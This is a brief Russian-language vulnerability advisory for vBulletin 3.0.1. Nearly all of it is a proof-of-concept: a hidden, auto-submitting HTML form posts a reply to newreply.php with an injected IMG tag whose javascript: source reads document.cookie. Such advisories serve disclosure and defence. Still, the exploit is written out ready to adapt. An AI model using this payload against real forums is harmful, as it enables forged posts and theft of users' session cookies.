Программа: vBulletin 3.0.1

Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

Пример:

<form action="http://host/newreply.php" name="vbform"

method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"

value="&lt;IMG
src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input
name="do" value="postreply"/>
<input name="t" value="123456"
/>
<input name="p" value="123456" />
<input type="submit"
class="button"
name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;

Оставить мнение